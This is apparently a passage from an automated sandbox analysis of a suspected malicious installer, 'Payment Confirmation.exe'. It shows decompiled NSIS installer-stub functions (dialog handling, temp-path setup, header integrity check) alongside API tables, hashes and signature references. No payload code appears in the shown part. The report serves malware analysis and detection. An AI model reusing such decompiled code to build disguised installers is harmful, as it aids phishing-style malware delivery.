					if(_t122 < 0) {
						L34:
						E00403EA0(0x40b);
						while(1) {
							_t37 =  *0x42051c;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x423f64; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42370c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423f64; // 0x2
							__eflags =  *0x4091ac - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BBA(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E54(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423fcc - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E76(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f4f8, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423fcc - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420530);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f4f8);
							}
							E00403E89();
							E00405B98(0x420538, "agrlexd Setup");
							E00405BBA(0x420538, _t125, _t130,  &(0x420538[lstrlenA(0x420538)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420538);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423718);
									 *0x41fd08 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f40,  *_t130 +  *0x423720 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423718 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E54(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423718, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42370c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423718, 8);
									E00403EA0(0x405);
									goto L58;
								}
								__eflags =  *0x423fcc - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423fc0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423718);
						 *0x423f48 = _t133;
						EndDialog(_t125,  *0x41f900);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423718, 0x40f, 0, 1);
						__eflags =  *0x42370c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420510, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420510,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EBB(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423718, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423fcc - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f900 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E2D();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f900 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423718);
						 *0x423718 = _a12;
						L58:
						if( *0x421538 == _t133) {
							_t142 =  *0x423718 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421538 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                                                  0x0040398a
                                                  0x00403993
                                                  0x00403ad4
                                                  0x00403ad8
                                                  0x00403adc
                                                  0x00403ade
                                                  0x00403ae3
                                                  0x00403aee
                                                  0x00403af9
                                                  0x00403afe
                                                  0x00403b00
                                                  0x00403b02
                                                  0x00403b05
                                                  0x00403b0a
                                                  0x00403b18
                                                  0x00403b25
                                                  0x00403b2c
                                                  0x00403b2c
                                                  0x00403b2d
                                                  0x00403b2d
                                                  0x00403b32
                                                  0x00403b38
                                                  0x00403b3f
                                                  0x00403b45
                                                  0x00403b47
                                                  0x00403b87
                                                  0x00403b8c
                                                  0x00403b91
                                                  0x00403b91
                                                  0x00403b96
                                                  0x00403b9f
                                                  0x00403ba1
                                                  0x00403ba6
                                                  0x00403bac
                                                  0x00403bb0
                                                  0x00403bb0
                                                  0x00403bb5
                                                  0x00403bbb
                                                  0x00000000
                                                  0x00000000
                                                  0x00403bc1
                                                  0x00403bc6
                                                  0x00403bcc
                                                  0x00000000
                                                  0x00000000
                                                  0x00403bd5
                                                  0x00403bdd
                                                  0x00403be2
                                                  0x00403be5
                                                  0x00403beb
                                                  0x00403bf0
                                                  0x00403bf3
                                                  0x00403bf9
                                                  0x00403bfe
                                                  0x00403c01
                                                  0x00403c07
                                                  0x00403c0f
                                                  0x00403c15
                                                  0x00403c1b
                                                  0x00403c1f
                                                  0x00403c26
                                                  0x00403c26
                                                  0x00403c26
                                                  0x00403c30
                                                  0x00403c42
                                                  0x00403c4e
                                                  0x00403c53
                                                  0x00403c5d
                                                  0x00403c63
                                                  0x00403c65
                                                  0x00403c6a
                                                  0x00403c67
                                                  0x00403c67
                                                  0x00403c67
                                                  0x00403c7a
                                                  0x00403c92
                                                  0x00403c94
                                                  0x00403c9a
                                                  0x00403caf
                                                  0x00403c9c
                                                  0x00403ca5
                                                  0x00403ca7
                                                  0x00403ca7
                                                  0x00403cb5
                                                  0x00403cc5
                                                  0x00403cd6
                                                  0x00403cdd
                                                  0x00403ce3
                                                  0x00403ce7
                                                  0x00403cec
                                                  0x00403cee
                                                  0x00000000
                                                  0x00403cf4
                                                  0x00403cf4
                                                  0x00403cf6
                                                  0x00000000
                                                  0x00000000
                                                  0x00403cfc
                                                  0x00403d00
                                                  0x00403d25
                                                  0x00403d2b
                                                  0x00403d31
                                                  0x00403d33
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d59
                                                  0x00403d5f
                                                  0x00403d61
                                                  0x00403d66
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d6c
                                                  0x00403d6f
                                                  0x00403d72
                                                  0x00403d89
                                                  0x00403d95
                                                  0x00403dae
                                                  0x00403db4
                                                  0x00403db8
                                                  0x00403dbd
                                                  0x00403dc3
                                                  0x00000000
                                                  0x00000000
                                                  0x00403dcd
                                                  0x00403dd8
                                                  0x00000000
                                                  0x00403dd8
                                                  0x00403d02
                                                  0x00403d08
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d0e
                                                  0x00403d14
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d1a
                                                  0x00403cee
                                                  0x00403de5
                                                  0x00403df1
                                                  0x00403df8
                                                  0x00000000
                                                  0x00403b49
                                                  0x00403b49
                                                  0x00403b4c
                                                  0x00403b7f
                                                  0x00403b7f
                                                  0x00403b81
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403b81
                                                  0x00403b4e
                                                  0x00403b52
                                                  0x00403b57
                                                  0x00403b59
                                                  0x00000000
                                                  0x00000000
                                                  0x00403b69
                                                  0x00403b71
                                                  0x00000000
                                                  0x00403b77
                                                  0x004039a5
                                                  0x004039a5
                                                  0x004039a9
                                                  0x004039ae
                                                  0x004039bd
                                                  0x004039bd
                                                  0x004039c6
                                                  0x004039cf
                                                  0x004039da
                                                  0x004039da
                                                  0x004039e6
                                                  0x00403a02
                                                  0x00403a05
                                                  0x00403a18
                                                  0x00403a1e
                                                  0x00403ac1
                                                  0x00000000
                                                  0x00403aca
                                                  0x00403a24
                                                  0x00403a31
                                                  0x00403a33
                                                  0x00403a35
                                                  0x00403a54
                                                  0x00403a54
                                                  0x00403a57
                                                  0x00403a5c
                                                  0x00403a5f
                                                  0x00403a6f
                                                  0x00403a70
                                                  0x00403a72
                                                  0x00403aa8
                                                  0x00403abb
                                                  0x00000000
                                                  0x00403abb
                                                  0x00403a74
                                                  0x00403a7a
                                                  0x00403a93
                                                  0x00403a98
                                                  0x00403a9a
                                                  0x00000000
                                                  0x00000000
                                                  0x00403a9c
                                                  0x00403a88
                                                  0x00403a88
                                                  0x00403a8a
                                                  0x00403a8a
                                                  0x00000000
                                                  0x00403a8a
                                                  0x00403a7d
                                                  0x00403a82
                                                  0x00000000
                                                  0x00403a82
                                                  0x00403a61
                                                  0x00403a67
                                                  0x00000000
                                                  0x00000000
                                                  0x00403a69
                                                  0x00000000
                                                  0x00403a69
                                                  0x00403a59
                                                  0x00000000
                                                  0x00403a59
                                                  0x00403a3f
                                                  0x00403a46
                                                  0x00403a4c
                                                  0x00403a4e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403a4e
                                                  0x00403a0a
                                                  0x00000000
                                                  0x004039e8
                                                  0x004039ee
                                                  0x004039f8
                                                  0x00403dfe
                                                  0x00403e04
                                                  0x00403e06
                                                  0x00403e0c
                                                  0x00403e11
                                                  0x00403e17
                                                  0x00403e17
                                                  0x00403e0c
                                                  0x00403e21
                                                  0x00000000
                                                  0x00403e21
                                                  0x004039e6

                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                                                  • ShowWindow.USER32(?), ref: 004039DA
                                                  • DestroyWindow.USER32 ref: 004039EE
                                                  • SetWindowLongA.USER32 ref: 00403A0A
                                                  • GetDlgItem.USER32 ref: 00403A2B
                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A3F
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403A46
                                                  • GetDlgItem.USER32 ref: 00403AF4
                                                  • GetDlgItem.USER32 ref: 00403AFE
                                                  • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B18
                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B69
                                                  • GetDlgItem.USER32 ref: 00403C0F
                                                  • ShowWindow.USER32(00000000,?), ref: 00403C30
                                                  • EnableWindow.USER32(?,?), ref: 00403C42
                                                  • EnableWindow.USER32(?,?), ref: 00403C5D
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C73
                                                  • EnableMenuItem.USER32 ref: 00403C7A
                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C92
                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CA5
                                                  • lstrlenA.KERNEL32(00420538,?,00420538,agrlexd Setup), ref: 00403CCE
                                                  • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                                                  • ShowWindow.USER32(?,0000000A), ref: 00403E11
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                  • String ID: agrlexd Setup
                                                  • API String ID: 4050669955-3735314997
                                                  • Opcode ID: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                                  • Instruction ID: 5fd13e9e65c650ae90d185cc2d11acb2e8fe01e0af56b63b73109b0399f4b85d
                                                  • Opcode Fuzzy Hash: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                                  • Instruction Fuzzy Hash: EFC1CF71A04201BBDB20AF61ED85D2B7EBCEB4470AB40453EF541B51E1C73DAA429F5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004035EB, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E004035EB(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x423f50; // 0x825438
				_t20 = E00405F28(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420538;
					"1033" = 0x7830;
					E00405A7F(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420538, 0);
					__eflags =  *0x420538;
					if(__eflags == 0) {
						E00405A7F(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x420538, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AF6("1033",  *_t20() & 0x0000ffff);
				}
				E004038B4(_t76, _t88);
				_t24 =  *0x423f58; // 0x80
				_t84 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
				 *0x423fc0 = _t24 & 0x00000020;
				 *0x423fdc = 0x10000;
				if(E0040576C(_t88, "C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040576C(_t96, _t84) == 0) {
						E00405BBA(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423f40, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423728 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038B4(_t76, __eflags);
							__eflags =  *0x423fe0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F56(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42370c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420510, 5); // executed
							_t37 = E00405EBA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EBA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x4236e0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x4236e0);
								 *0x423704 = _t85;
								RegisterClassA(0x4236e0);
							}
							_t39 =  *0x423720; // 0x0
							_t42 = DialogBoxParamA( *0x423f40, _t39 + 0x00000069 & 0x0000ffff, 0, E00403981, 0); // executed
							E0040353B(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423f40; // 0x400000
						 *0x4236f4 = _t28;
						_v20 = 0x624e5f;
						 *0x4236e4 = E00401000;
						 *0x4236f0 = _t76;
						 *0x423704 =  &_v20;
						if(RegisterClassA(0x4236e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420510 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f40, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x423f78; // 0x82b77c
					_t79 = 0x422ee0;
					E00405A7F( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x422ee0, 0);
					_t62 =  *0x422ee0; // 0x6e
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422ee1;
						 *((char*)(E004056B6(0x422ee1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B98(_t84, E0040568B(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056D2(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                                                  0x004035f1
                                                  0x004035fa
                                                  0x00403601
                                                  0x00403603
                                                  0x00403617
                                                  0x00403629
                                                  0x00403633
                                                  0x00403638
                                                  0x0040363e
                                                  0x00403651
                                                  0x00403651
                                                  0x0040365c
                                                  0x00403605
                                                  0x00403610
                                                  0x00403610
                                                  0x00403661
                                                  0x00403666
                                                  0x0040366b
                                                  0x00403674
                                                  0x00403679
                                                  0x0040368a
                                                  0x00403711
                                                  0x00403719
                                                  0x00403722
                                                  0x00403722
                                                  0x00403738
                                                  0x0040373e
                                                  0x0040374c
                                                  0x004037db
                                                  0x004037e3
                                                  0x004037ed
                                                  0x004037f2
                                                  0x004037f8
                                                  0x00403882
                                                  0x00403887
                                                  0x00403889
                                                  0x004038a5
                                                  0x00000000
                                                  0x004038a5
                                                  0x0040388b
                                                  0x00403891
                                                  0x00403899
                                                  0x00403899
                                                  0x00000000
                                                  0x00403891
                                                  0x00403806
                                                  0x00403811
                                                  0x00403816
                                                  0x00403818
                                                  0x0040381f
                                                  0x0040381f
                                                  0x0040382a
                                                  0x00403832
                                                  0x00403834
                                                  0x00403836
                                                  0x0040383f
                                                  0x00403842
                                                  0x00403848
                                                  0x00403848
                                                  0x0040384e
                                                  0x00403867
                                                  0x00403878
                                                  0x00000000
                                                  0x0040387d
                                                  0x004037e5
                                                  0x004037e7
                                                  0x00000000
                                                  0x00403752
                                                  0x00403752
                                                  0x00403758
                                                  0x00403762
                                                  0x0040376a
                                                  0x00403774
                                                  0x0040377a
                                                  0x00403788
                                                  0x004038aa
                                                  0x004038aa
                                                  0x00000000
                                                  0x004038aa
                                                  0x0040378e
                                                  0x00403797
                                                  0x004037d6
                                                  0x00000000
                                                  0x004037d6
                                                  0x00403690
                                                  0x00403690
                                                  0x00403695
                                                  0x00000000
                                                  0x00000000
                                                  0x0040369a
                                                  0x0040369f
                                                  0x004036af
                                                  0x004036b4
                                                  0x004036bb
                                                  0x00000000
                                                  0x00000000
                                                  0x004036bf
                                                  0x004036c1
                                                  0x004036ce
                                                  0x004036ce
                                                  0x004036d6
                                                  0x004036dc
                                                  0x00403704
                                                  0x0040370c
                                                  0x00000000
                                                  0x004036ee
                                                  0x004036ef
                                                  0x004036f8
                                                  0x004036fe
                                                  0x004036ff
                                                  0x00000000
                                                  0x004036ff
                                                  0x004036fa
                                                  0x004036fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004036fc
                                                  0x004036dc

                                                  APIs
                                                    • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                    • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                  • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Payment Confirmation.exe" ,00000000), ref: 0040365C
                                                  • lstrlenA.KERNEL32(naqeld,?,?,?,naqeld,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036D1
                                                  • lstrcmpiA.KERNEL32(?,.exe,naqeld,?,?,?,naqeld,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000), ref: 004036E4
                                                  • GetFileAttributesA.KERNEL32(naqeld), ref: 004036EF
                                                  • LoadImageA.USER32 ref: 00403738
                                                    • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                                  • RegisterClassA.USER32 ref: 0040377F
                                                  • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                                                  • CreateWindowExA.USER32 ref: 004037D0
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403806
                                                  • GetClassInfoA.USER32 ref: 00403832
                                                  • GetClassInfoA.USER32 ref: 0040383F
                                                  • RegisterClassA.USER32 ref: 00403848
                                                  • DialogBoxParamA.USER32 ref: 00403867
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\Payment Confirmation.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$naqeld$6B
                                                  • API String ID: 1975747703-3339981308
                                                  • Opcode ID: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                                  • Instruction ID: 6624008b3449f808402c67b3262d240ca0850aee1e0dcbc9c28568ef27b6b269
                                                  • Opcode Fuzzy Hash: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                                  • Instruction Fuzzy Hash: 6A61E9B17002047EE620AF619D45E3B7ABCEB4474AF40457FF941B22E2D77D9E428A2D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402C55, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 80%
                                                  			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\engineer\\Desktop\\Payment Confirmation.exe";
				 *0x423f4c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\Payment Confirmation.exe", 0x400);
				_t89 = E0040586F(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\engineer\\Desktop";
				E00405B98("C:\\Users\\engineer\\Desktop", _t91);
				E00405B98(0x42c000, E004056D2(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x41f0e8 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					__eflags =  *0x423f54 - _t82; // 0x2fa00
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x423f54; // 0x2fa00
						E004030B3(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E8E(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x423f50 = _t94;
							 *0x423f58 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x423f5c =  *0x423f5c + 1;
								__eflags =  *0x423f5c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405830(0x423f60, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030B3( *0x40b0d8);
					_t65 = E00403081( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x423f54; // 0x2fa00
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403081(0x4170e8, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423f54;
						if( *0x423f54 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E00405830( &_v44, 0x4170e8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40b0d8; // 0x2fa00
